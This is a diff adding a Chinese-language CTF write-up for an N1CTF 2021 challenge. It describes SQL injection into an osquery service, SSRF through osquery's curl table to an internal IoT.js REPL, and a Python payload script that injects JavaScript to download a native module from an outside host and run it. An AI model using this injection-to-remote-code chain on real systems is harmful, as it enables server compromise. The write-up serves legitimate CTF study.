--- a/N1CTF 2021.md
+++ b/N1CTF 2021.md
@@ -207,9 +207,132 @@ print(r.text)
 
 ### 题目
 
+这个题是一个黑盒的题目，进去之后，如下所示
 
+![n1ctf20211](img/N1CTF2021/n1ctf20211.png)
+
+很明显是一个**SQL注入**的语句，经过尝试之后，发现可以注入`1';--`
+
+![n1ctf20212](img/N1CTF2021/n1ctf20212.png)
+
+然后开始确定数据库类型，经过测试，发现与`sqlite`有关
+
+![n1ctf20213](img/N1CTF2021/n1ctf20213.png)
+
+里面有很多奇怪的东西，比如`azure_instance_tags`，经过谷歌可得知这个是[`osquery`](https://github.com/osquery/osquery/blob/master/specs/azure_instance_tags.table)，它是基于`sql`的操作系统监控工具，我们可以用它来读取一些系统的信息
+
+#### `select * from file where directory="/";`
+
+![n1ctf20214](img/N1CTF2021/n1ctf20214.png)
+
+#### `select * from listening_ports;`
+
+![n1ctf20215](img/N1CTF2021/n1ctf20215.png)
+
+#### `select * from processes;`
+
+> [xinted](https://www.cnblogs.com/lsgxeva/p/9280777.html)
+
+![n1ctf20216](img/N1CTF2021/n1ctf20216.png)
+
+#### `select * from file where directory="/etc/xinetd.d/";`
+
+![n1ctf20217](img/N1CTF2021/n1ctf20217.png)
+
+#### `select * from augeas where path="/etc/xinetd.d/ctf";`
+
+> 查看`/etc/xinetd.d`配置文件
+
+![](img/N1CTF2021/n1ctf20218.png)
+
+我们发现了部署在`16324`端口的是`iotjs`，接下来就是突破`IoT.js`，这里其实部署的还有`repl.js`
+
+攻击这个服务还是要利用`16324`端口，但是在外部访问不到还是要借用`osquery`，经过[查找](https://osquery.io/schema/5.0.1/#curl)，发现`osquery`可以调用`curl`，它包含下面几个字段，其中能控制进行攻击的只有`user_agent`字段
+
+![n1ctf20219](img/N1CTF2021/n1ctf20219.png)
+
+> 这里不知道是不是给的docker的环境的原因，复现用的`ctf.xinetd`中没这句`DENABLE_MODULE_NAPI=ON`
+>
+> *Building N-API with IoT.js*
+>
+> *You need to append the --n-api parameter to the build command (e.g. tools/build.py --n-api).*
+> *This automatically adds the N-API module to IoT.js.*
+>
+> *To run N-API test you should also append --n-api after the testrunner.py.*
+>
+> 我们可以通过自定义模块，然后进行导入执行就可以了
+
+结合当前信息我们可以知道
+
+- 通过`curl`来攻击内部服务
+- `repl.js`在其中运行
+- 可以通过`IOTJS`上传文件执行代码
+
+参考官方文档，执行并得到`flag`
+
+- [`https://github.com/jerryscript-project/iotjs/blob/master/docs/devs/Writing-New-Module.md`](https://github.com/jerryscript-project/iotjs/blob/master/docs/devs/Writing-New-Module.md)
+- [`https://github.com/jerryscript-project/iotjs/blob/master/docs/api/IoT.js-API-N-API.md`](https://github.com/jerryscript-project/iotjs/blob/master/docs/api/IoT.js-API-N-API.md)
 
 ### payload
+
+```python
+#!/usr/bin/python
+#-*- coding: utf-8 -*-
+import requests
+import random
+import base64
+
+
+# SQL Injection
+url = "http://47.57.246.66:12321/?str=world';{};--"
+# Payload from other team
+payload = "select group_concat(result)from curl where url='http://127.0.0.1:16324' and user_agent='\n\n\n\n\n\n\n\n\n\n\n\n\n\n{node}\n\n\n\n\n\n\n\n\n\n\n'"
+
+
+"""
+Write native module to server
+
+fs = require("fs");
+http = require("http")
+
+f = fs.openSync("/tmp/styp.node", "w")
+http.get({
+    host: "158.101.144.10",
+    port: 80,
+    path: "/styp.node?exp"
+}, function(resp){
+    resp.on("data", function(exploit){
+        fs.writeSync(f, exploit, 0, exploit.length)
+    });
+    resp.on("end", function(){
+        fs.closeSync(f)
+        process.exit(1)
+    });
+});
+
+"""
+gadget_init = "fs=require(\"fs\");f=fs.openSync(\"/tmp/dem0.node\",\"w\");http=require(\"http\");http.get({host:\"ip\",port:80,path:\"/demomod.node\"},function(r){r.on(\"data\",function(c){fs.writeSync(f, nc, 0, c.length);});r.on(\"end\", function(){fs.closeSync(f);process.exit(1);})});"
+# gadget_init = "var fs = require('fs');var file = '/tmp/fff'var data = new Buffer('aaa');var fd = fs.openSync(file, 'w');var bytes = fs.writeSync(fd, data, 0, data.length);fd.close();"
+
+payload_init = payload.format(node=gadget_init)
+
+r = requests.get(url.format(payload_init))
+print(r.text)
+
+"""
+Run my native module
+
+sty = require("/tmp/styp.node")
+console.log(sty)
+"""
+gadget_shell = "dem0=require(\"/tmp/dem0.node\");console.log(dem0.hello());"
+payload_shell = payload.format(node=gadget_shell)
+
+r = requests.get(url.format(payload_shell))
+print(r.text)
+```
+
+
 
 ## funny_web
 
